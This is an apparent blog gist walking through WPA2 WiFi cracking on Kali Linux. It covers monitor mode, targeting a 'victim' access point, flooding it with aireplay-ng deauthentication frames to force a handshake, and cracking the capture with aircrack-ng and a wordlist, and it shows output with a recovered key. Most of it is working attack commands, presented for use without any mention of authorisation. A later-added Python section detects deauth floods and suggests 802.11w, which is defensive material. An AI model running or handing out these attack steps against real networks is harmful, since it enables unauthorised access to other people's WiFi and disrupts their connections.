d3adR1nger

WPA2 cracking on Kali Linux with Dictionary attack Gist

Dec 04, 2020

Crack WPA2 with Kali Linux Dictionary Attack

Whazuuuuuup

Wazzzaaaap WiFi hackers! Here is the command Gist of the Crack WPA2 with Kali Linux writeup I wrote on the Hacker Realm on Sudorealm.com.

Setup

Connect your Wireless Card dude, don't forget that!
Check if it is connected: ifconfig wlan0 or iwconfig wlan0

Put the Card on Monitor Mode

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  448 NetworkManager
  525 dhclient
  654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

And check if you are on monitor mode with iwconfig wlan0mon 😉

Sniffing the air for targets

airodump-ng wlan0mon

Wait until your target pops up on the list and press Ctrl+C to stop the monitoring.

Start targeted monitoring of your victim AP

airodump-ng --bssid 50:C7:BF:DC:4C:E8 -c 11 wlan0mon -w sudorealm

⚠ Do not Ctrl+C, you want that running until you catch a handshake.
Your target's bssid and the channel will be displayed on the generic monitoring you did before.
-w sudorealm will store the results of the monitoring in several files. The one you want is sudorealm-01.cap, which has the handshake stored in it.

Deauthenticate victim to force a handshake Capture

➕ On a new terminal window.

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon 

13:43:26  Waiting for beacon frame (BSSID: 50:C7:BF:DC:4C:E8) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:26  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:27  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]
13:43:28  Sending DeAuth (code 7) to broadcast -- BSSID: [50:C7:BF:DC:4C:E8]

You can change the -0 0 to -0 20 to force the victim to disconnect and connect again.

Now wait until the other terminal shows this:

CH 11 ][ Elapsed: 7 mins ][ 2019-02-22 13:43 ][ WPA handshake: 50:C7:BF:DC:4C:E8  

WPA handshake of the victim AP. You are Set. 💪
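
Seen from the defending side, the deauthentication step above leaves a clear trace: a burst of deauth frames carrying the AP's BSSID, addressed to broadcast. The Python below is an added example, not part of the original gist; the whitespace-separated log format, the 02:00:... addresses and the window and threshold values are assumptions chosen for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample, one deauthentication frame per line:
#   seconds  transmitter(BSSID)  receiver  reason-code
# The burst from 50:c7:bf:dc:4c:e8 mimics the aireplay-ng output above
# (reason 7, sent to broadcast). 02:00:00:00:00:01 is a made-up AP that
# occasionally deauthenticates one client, which is normal behaviour.
SAMPLE_LOG = """
50.0   02:00:00:00:00:01  02:00:00:00:00:aa  3
100.0  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
100.4  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
101.0  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
101.5  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
102.0  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
102.4  50:c7:bf:dc:4c:e8  ff:ff:ff:ff:ff:ff  7
400.0  02:00:00:00:00:01  02:00:00:00:00:ab  3
900.0  02:00:00:00:00:01  02:00:00:00:00:aa  8
"""


def parse(log):
    """Yield (time, transmitter, receiver, reason) from the sample format."""
    for line in log.splitlines():
        if line.strip():
            ts, src, dst, reason = line.split()
            yield float(ts), src.lower(), dst.lower(), int(reason)


def detect_deauth_floods(log, window=5.0, threshold=5):
    """Flag transmitters that send >= threshold deauths within window seconds."""
    recent = defaultdict(deque)   # transmitter -> recent (time, receiver)
    alerts = {}
    for ts, src, dst, _reason in parse(log):
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:      # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(
                src, {"first_seen": q[0][0], "peak": 0, "broadcast": False})
            alert["peak"] = max(alert["peak"], len(q))
            alert["broadcast"] |= any(d == BROADCAST for _, d in q)
    return alerts


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(SAMPLE_LOG).items():
        print(f"possible deauth flood claiming BSSID {bssid}: {info}")
```

Deauthentication frames are unauthenticated in plain WPA2, so the transmitter address in such an alert is only a claim. Enabling 802.11w Protected Management Frames on the AP and its clients makes forged deauths ineffective.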

Dictionary Attack to crack the Handshake

aircrack-ng sudorealm-01.cap -w Desktop/sudorealm.txt

Supposing you have some dictionaries somewhere in your system.
If you don't, here is a good start:

git clone https://github.com/danielmiessler/SecLists.git

Google that a bit and you'll thank me later.

[00:00:00] 4/20 keys tested (316.73 k/s) 

      Time left: 0 seconds                                      20.00%

                         KEY FOUND! [ sudorealmRulez ]


      Master Key     : C3 3E A1 D6 E5 9E 58 66 B2 20 3E AC 27 90 44 E2 
                       06 17 91 76 B7 98 A7 3C 9D 61 67 32 99 95 72 0E 

      Transient Key  : EF 0B 80 7E 59 5A F4 15 51 4C 48 F8 62 7F 81 E7 
                       D8 E7 3F E3 0A D4 2C 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : D5 D4 EB 86 16 33 4F FC 2C 74 3C E6 DB AF 81 70 

The Password is Cracked, we are happy, and it's time for net surfing! 🏄‍♀️

Bam Boom hacked! 👩‍💻 Leave your comments below or find me @

🤖 https://www.reddit.com/user/stantz16 | The front page of the internet.

🐥 https://twitter.com/DevThanos | The one that got hacked good.

🤵 https://www.linkedin.com/in/athanasios-stantzouris-34ba44141/ | Facebook but not facebook.

Thanks Yall 🎉🎈🥳

Zero Cool, Mess with the best, Die like the rest
